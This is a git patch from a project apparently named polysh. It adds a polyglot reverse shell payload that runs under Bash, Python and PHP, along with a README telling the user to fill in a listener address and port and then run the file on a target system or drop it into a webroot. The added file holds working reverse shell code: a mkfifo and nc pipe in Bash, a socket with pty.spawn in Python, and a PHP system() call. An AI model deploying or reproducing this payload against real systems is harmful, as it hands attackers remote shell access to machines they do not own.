From 32e3975f7e0ebc622f579c77cb6a19909f5a4633 Mon Sep 17 00:00:00 2001
From: maride <git@maride.cc>
Date: Sat, 1 Nov 2025 23:53:00 +0100
Subject: [PATCH] Add reverse shells, add README

---
 README.md | 15 +++++++++++++++
 poly      | 16 ----------------
 polysh    | 19 +++++++++++++++++++
 3 files changed, 34 insertions(+), 16 deletions(-)
 create mode 100644 README.md
 delete mode 100644 poly
 create mode 100644 polysh

diff --git a/README.md b/README.md
new file mode 100644
index 0000000..f774251
--- /dev/null
+++ b/README.md
@@ -0,0 +1,15 @@
+# polysh
+
+Polymorph reverse shell payload for Bash, Python, and PHP.
+
+## Use
+
+Replace `{{{ADDR}}}` and `{{{PORT}}}` according to your listener:
+- `sed -i "s/{{{ADDR}}}/10.0.0.42/g" polysh`
+- `sed -i "s/{{{PORT}}}/1337/g" polysh`
+
+After that, bring it onto your target system and either `bash polysh`, `python polysh` or `php polysh` it - or bring it into webroot and call it.
+
+## Credits
+
+Reverse shells taken from [revshells.com](https://www.revshells.com/), slightly modified for the poly magic.
diff --git a/poly b/poly
deleted file mode 100644
index ef2e73e..0000000
--- a/poly
+++ /dev/null
@@ -1,16 +0,0 @@
-# BASH
-"echo" "poc.sh"
-"exit" "1"
-
-# PYTHON
-import sys
-print("poc.py")
-sys.exit(1)
-"""
-
-# PHP
-<?php 
-print("poc.php");
-return 1
-?>
-"""
diff --git a/polysh b/polysh
new file mode 100644
index 0000000..ba43a7c
--- /dev/null
+++ b/polysh
@@ -0,0 +1,19 @@
+# BASH
+"declare" "tmpdir=$(mktemp -u)"
+"mkfifo" "$tmpdir"
+"bash" "-c" "cat $tmpdir|sh -i 2>&1|nc {{{ADDR}}} {{{PORT}}} >$tmpdir"
+"exit" "1"
+
+# PYTHON
+import sys, socket, os, pty
+s=socket.socket()
+s.connect(("{{{ADDR}}}", {{{PORT}}}))
+[os.dup2(s.fileno(), fd) for fd in (0, 1, 2)]
+pty.spawn("sh")
+"""
+
+# PHP
+<?php
+system(file_get_contents($_SERVER['SCRIPT_NAME']));
+?>
+"""